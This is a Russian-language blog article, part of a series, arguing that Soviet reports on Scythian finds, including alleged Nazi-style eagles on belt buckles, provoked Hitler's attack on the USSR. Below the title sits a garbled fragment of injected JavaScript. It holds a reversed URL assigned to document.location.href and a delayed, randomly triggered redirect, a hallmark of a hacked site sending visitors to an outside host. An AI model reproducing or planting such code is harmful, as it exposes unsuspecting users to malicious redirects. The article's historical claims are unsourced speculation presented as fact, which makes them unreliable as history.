Исследования Протестантские авторы

Скифские арийцы. Гитлер идет ва-банкНа чтение 6 мин


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Часть 2 (читать часть 1)

Гитлер идет ва-банк.

В своей предыдущей статье из этого цикла я предположил, что в нападении Гитлера на Россию одной из основных причин могла явиться та ошеломляющая находка, о которой писали советские журналы. Просматривая археологические журналы того времени, создается впечатление, что материал в них был подобран таким образом, чтобы максимально позлить Гитлера – подразнить его советскими находками.

К примеру, журнал Советская археология, ставший на десятилетия официальным рупором советской археологии, в общем-то и основан был – под находки скифской цивилизации на территории Советского Союза. О которой и сообщает с триумфом уже самый первый выпуск этого журнала (доступен для загрузки).

Обратите внимание, как в самом первом выпуске этого журнала первой идет статья, разумеется, открыто идеологическая, под названием «Задачи «Советской Археологии»». Очень интересная статья – своего рода программа действий, утверждающая превосходство советской археологии над археологией западной. Ну, а когда речь шла о «западной археологии», это означало археологию в первую очередь немецкую.

А далее в этом самом первом выпуска журнала «Советская археология» уже открыто говорилось о скифах. См. Советская археология // М.: 1936. 306 с. Задачи «Советской Археологии». — 1, Б. Рабинович (Ленинград). О датировке некоторых скифских курганов Среднего Приднепровья. — 79 – 105. В этой статье говорилось о скифской культуре, и о времени ее появления между 6 и 7 веками до н.э. Именно то время, когда, как считали немецкие археологи 19-го и начала 20-го веков, арийцы вышли из Ирана!

Если Сталин хотел тогда позлить Гитлера, то лучшего способа он и выдумать не мог. Гитлер, искавший блестящее прошлое своей нации на Севере, и находивший одни лишь глиняные черепки, вдруг увидел – где она, родина арийцев. Она была на Востоке. В России!

Действительно, содержания одного лишь из откопанных уже в те годы курганов хватило бы на десятилетия восторженных анализа немецких археологов. А таких курганов были сотни. Тысячи! Искушение было слишком большим. Гитлер увидел, что Сталин откопал такое мощное идеологическое орудие, что все усилия немецких археологов в сравнению с ним кажутся просто возней детей в песочнице. Гитлер сразу признал, что скифы – это и есть истинные арийцы. И только Сталин мог разрушить созданный Гитлером миф. Более того – Сталин мог воспламенить свой народ осознанием его исторической важности. Гитлер бы это сделал (да он это и делал) не задумываясь, будь у него хоть малая толика таких аргументов власти, что оказались на руках Сталина.

Гитлер был, однако, на некоторое время успокоен тем фактом, что вряд ли Сталин пустит откопанное им идеологическое оружие в ход. Не то, чтобы Сталин не понимал его значимости – хотя он вряд ли чувствовал эту значимость так глубоко, как Гитлер. Сталин боялся пустить это идеологическое оружие, потому что боялся, что оно может пошатнуть его власть и авторитет. Ведь сам он не имел чести принадлежать племени скифов. И потому ему надо было помалкивать. Но и помалкивать не хотелось.

Гитлеру нетрудно было угадать, что Сталин только бряцает перед его носом этими находками. Скорее из гордости, нежели по каким другим причинам. Гитлер понял это хотя бы потому, что все статьи о скифах, как и все направление исследования, Сталин (ярый антисемит) отдал в руки советских евреев. А это значило, что вспышки «советского скифства» — русофильства – не будет. Более того – вся эта скифская история могла снова начать принимать ближневосточный колорит. Сталин сделал тогда крупную ошибку – он выдал себя и свои планы с головой. Он только раздразнил Гитлера. И Гитлер решил, что пора брать ситуацию в свои руки.

В 1941-ом году, уже после начала войны, выходит на трехстах с лишним страницах очередной номер журнала Советская археология. Значительная часть номера была посвящена новейшим археологическим находкам в Крыму, от которых у Гитлера не могли не потечь слюнки. Журнал этот, по счастью, доступен сегодня для загрузки, и вы сами можете полистать его – могу прислать вам копию. Посвящался он академику Сергею Александровичу Жебелеву и пятидесятилетию его научной деятельности – посвященной почти в целом археологии Причерноморья.

Но я не хочу создать впечатление, будто любимым занятием Гитлера было читать журнал Советская археология. Однако Гиммлер регулярно осведомлял своего фюрера о находках в Причерноморье. Наверняка, прежде чем этот выпуск Советского археолога достиг своего советского читателя в холодную военную зиму 1941-го, его материал был у Гитлера на столе. Еще до начала войны. Я сам долгое время работал в редакции и в издательстве и знаю – какая это долгая работа, выпуск научного журнала. Журнал Советская археология издавался раз в году, а то и реже. И через минуту я скажу – почему я почти уверен, что Гитлеру доставили эти материалы еще до их публикации. Потому что там было что почитать Гитлеру. И на что посмотреть. Но назову лишь одну статью. Хватило бы и ее, я думаю, чтобы Гитлер – человек импульсивный и интуитивный – начал войну против Советского Союза. Что же это за статья?

Это статья А. П. Манцевича: О скифских поясах. — СА, VII. М., 1941. Статья эта рассказывает о многочисленных находках скифских поясов, которые были частью воинского снаряжения скифов. Даются описания этих поясов, места их находок. Были в журнале и изображения этих поясов. Но не было – по крайней мере в опубликованном варианте журнала (и вы скоро узнаете – почему) самого главного – тех пряжек, которыми эти пояса застегивались, и которые были найдены вместе с поясами.

Увидев рисунки, снятые с этих пряжек – и не вошедшие, по очевидным причинам в тот выпуск Советского археолога – Гитлер уже больше не мог ждать. На этих поясах был изображен… орел Третьего рейха. Символ истинных арийцев! То, что Гитлер безуспешно искал на Севере как из рога изобилия лилось на Востоке. И ему надо было взять его прямо сейчас, не дожидаясь конца войны с Англией и отвергнув заключенные с Советским Союзом – путем долгих и тщательных переговоров – договора о взаимном ненападении.

Золото скифов. Часть 2. Гитлер идет ва-банк.

Кстати, если хотите знать, Гитлер прекратил переговоры со Сталиным (велись через Молотова и Риббентропа) из-за одного небольшого, но щекотливого вопроса. Гитлер предложил Сталину очертить так называемые «жизненные сферы влияний» России и Германии, в которые входил, надо полагать, весь мир. И уж вроде поделили было они весь мир, по дружески, кому чего. Но вот на Иране не сошлись. Сталин уперся в то, что Иран должен быть в сфере его «жизненных интересов», потому как лежит у него под брюхом. Гитлер настаивал – не поясняя, в чем важность Ирана для него – что Иран переходит Германии. Мелочь, казалось бы – но вот нашла коса на камень. Рассорились. Разбежались. Ограничились договором о ненападении. И то, как оказалось – липовым. Но не уходите далеко, друзья. В следующей, заключительной статье этого цикла мы поговорим о тех археологических экспедициях, о тех раскопках, которыми нацистские ученые займутся в первые же месяцы, даже недели войны.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4.4/5

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.